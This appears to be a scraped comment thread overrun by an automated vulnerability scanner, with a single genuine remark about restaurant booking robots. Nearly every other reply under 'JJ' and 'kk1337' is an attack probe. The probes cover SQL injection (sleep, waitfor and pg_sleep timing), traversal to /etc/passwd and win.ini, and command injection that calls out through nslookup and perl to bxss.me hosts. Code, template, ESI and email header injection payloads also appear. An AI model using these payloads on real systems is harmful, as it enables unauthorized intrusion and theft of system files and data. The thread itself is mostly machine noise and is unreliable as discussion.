)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
$(nslookup hitdpwelsufuwf72a1.bxss.me||perl -e "gethostbyname('hitdpwelsufuwf72a1.bxss.me')")
re: JJ
"+"A".concat(70-3).concat(22*4).concat(122).concat(70).concat(102).concat(88)+(require"socket"
Socket.gethostbyname("hitmg"+"asithino5d6f5.bxss.me.")[3].to_s)+"
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
&nslookup hitppzhhgzshcdb408.bxss.me&'\"`0&nslookup hitppzhhgzshcdb408.bxss.me&`'
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(89)+(require'socket'
Socket.gethostbyname('hitmc'+'cuqcmskz5f4e9.bxss.me.')[3].to_s)+'
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&'\"`0&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&`'
re: JJ
';print(md5(31337));$a='
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
|(nslookup hitjiwpthmyed69410.bxss.me||perl -e "gethostbyname('hitjiwpthmyed69410.bxss.me')")
re: JJ
";print(md5(31337));$a="
re: JJ
file:///etc/passwd
re: JJ
'"
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
`(nslookup hitojhbwibnleecd98.bxss.me||perl -e "gethostbyname('hitojhbwibnleecd98.bxss.me')")`
re: JJ
${@print(md5(31337))}
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
<!--
re: JJ
/etc/shells
re: JJ
;(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")|(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")&(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")
re: JJ
${@print(md5(31337))}\
re: JJ
/WEB-INF/web.xml
re: JJ
c:/windows/win.ini
re: JJ
'.print(md5(31337)).'
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
bxss.me
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+997-997-1=0+0+0+1 --
re: JJ
-1 OR 3+997-997-1=0+0+0+1 --
re: JJ
-1 OR 2+385-385-1=0+0+0+1
re: JJ
-1 OR 3+385-385-1=0+0+0+1
re: JJ
-1' OR 2+296-296-1=0+0+0+1 --
re: JJ
-1' OR 3+296-296-1=0+0+0+1 --
re: JJ
-1' OR 2+569-569-1=0+0+0+1 or 'IZ6AtQH6'='
re: JJ
-1' OR 3+569-569-1=0+0+0+1 or 'IZ6AtQH6'='
re: JJ
-1" OR 2+274-274-1=0+0+0+1 --
re: JJ
-1" OR 3+274-274-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
BddABrpH'; waitfor delay '0:0:15' --
re: JJ
-5 OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: JJ
-5) OR 199=(SELECT 199 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: JJ
PhOVAyvY' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
re: JJ
UVRQFlcd') OR 215=(SELECT 215 FROM PG_SLEEP(15))--
re: JJ
MChBWX0o')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@nc0Zj
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.
re: kk1337
3dPXIlKr
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
-1 OR 2+923-923-1=0+0+0+1
re: kk1337
-1 OR 3+923-923-1=0+0+0+1
re: kk1337
grqrBmak
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
-1 OR 2+808-808-1=0+0+0+1
re: kk1337
-1 OR 3+808-808-1=0+0+0+1
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
UBnryigN'; waitfor delay '0:0:15' --
re: kk1337
aKBETc9q'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--
re: kk1337
-5 OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 745=(SELECT 745 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 388=(SELECT 388 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 253=(SELECT 253 FROM PG_SLEEP(15))--
re: kk1337
xoDC3nnK' OR 929=(SELECT 929 FROM PG_SLEEP(15))--
re: kk1337
c5yzRdfN' OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: kk1337
eWwQDsSG') OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: kk1337
T3E2AtOe') OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: kk1337
vo03ngz2')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--
re: kk1337
s6ydlbeL')) OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@lWQNd
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@4ePME
re: kk1337
1E09G0e4O
re: kk1337
%0abcc:074625.67-13745.67.59ad6.19990.2@bxss.me
re: kk1337
to@example.com>%0d%0abcc:074625.67-13746.67.59ad6.19990.2@bxss.me
re: kk1337
response.write(9364609*9727312)
re: kk1337
'+response.write(9364609*9727312)+'
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
"+response.write(9364609*9727312)+"
re: kk1337
${9999090+9999333}
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
file:///etc/passwd
re: kk1337
../../../../../../../../../../../../../../../proc/version
re: kk1337
'.gethostbyname(lc('hitza'.'ckfqntwpbec85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(99).chr(77).'
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kk1337
".gethostbyname(lc("hitzd"."ynnnbebj0ae59.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(72).chr(107).chr(88)."
re: kk1337
../../../../../../../../../../etc/passwd%00.jpg
re: kk1337
)
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kk1337
!(()&&!|*|*|
re: kk1337
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kk1337
^(#$!@#$)(()))******
re: kk1337
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kk1337
/etc/passwd
re: kk1337
echo vjcvqg$()\ sfqmkr\nz^xyu||a #' &echo vjcvqg$()\ sfqmkr\nz^xyu||a #|" &echo vjcvqg$()\ sfqmkr\nz^xyu||a #
re: kk1337
%2fetc%2fpasswd
re: kk1337
&echo pvrndt$()\ kfvtmw\nz^xyu||a #' &echo pvrndt$()\ kfvtmw\nz^xyu||a #|" &echo pvrndt$()\ kfvtmw\nz^xyu||a #
re: kk1337
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
|echo xgvylj$()\ orjerk\nz^xyu||a #' |echo xgvylj$()\ orjerk\nz^xyu||a #|" |echo xgvylj$()\ orjerk\nz^xyu||a #
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(106).concat(88)+(require"socket"
Socket.gethostbyname("hitnr"+"pwnaddor328b7.bxss.me.")[3].to_s)+"
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kk1337
(nslookup hiteifntwulpqc727d.bxss.me||perl -e "gethostbyname('hiteifntwulpqc727d.bxss.me')")
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(121).concat(86).concat(102).concat(75)+(require'socket'
Socket.gethostbyname('hitrk'+'taqmlnswff046.bxss.me.')[3].to_s)+'
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kk1337
$(nslookup hitwxzuyvcgubbce0c.bxss.me||perl -e "gethostbyname('hitwxzuyvcgubbce0c.bxss.me')")
re: kk1337
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kk1337
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
&nslookup hitemaxdluiyi22fd1.bxss.me&'\"`0&nslookup hitemaxdluiyi22fd1.bxss.me&`'
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kk1337
http://bxss.me/t/fit.txt%3F.jpg
re: kk1337
&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&'\"`0&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&`'
re: kk1337
';print(md5(31337));$a='
re: kk1337
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: kk1337
/etc/shells
re: kk1337
|(nslookup hitvfswumhivef3f1a.bxss.me||perl -e "gethostbyname('hitvfswumhivef3f1a.bxss.me')")
re: kk1337
";print(md5(31337));$a="
re: kk1337
'"
re: kk1337
file:///etc/passwd
re: kk1337
c:/windows/win.ini
re: kk1337
`(nslookup hithzvqdumdjib8ca0.bxss.me||perl -e "gethostbyname('hithzvqdumdjib8ca0.bxss.me')")`
re: kk1337
${@print(md5(31337))}
re: kk1337
<!--
re: kk1337
/\../\../\../\../\../\../\../etc/passwd
re: kk1337
bxss.me
re: kk1337
;(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")|(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")&(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")
re: kk1337
${@print(md5(31337))}\
re: kk1337
/WEB-INF/web.xml
re: kk1337
'.print(md5(31337)).'
re: kk1337
C:\WINDOWS\system32\drivers\etc\hosts
re: kk1337
../../../../../../../../../../windows/win.ini%00.jpg
re: kk1337
/../../../../../../../../../../boot.ini
re: kk1337
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kk1337
..\..\..\..\..\..\..\..\windows\win.ini
re: kk1337
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kk1337
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kk1337
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\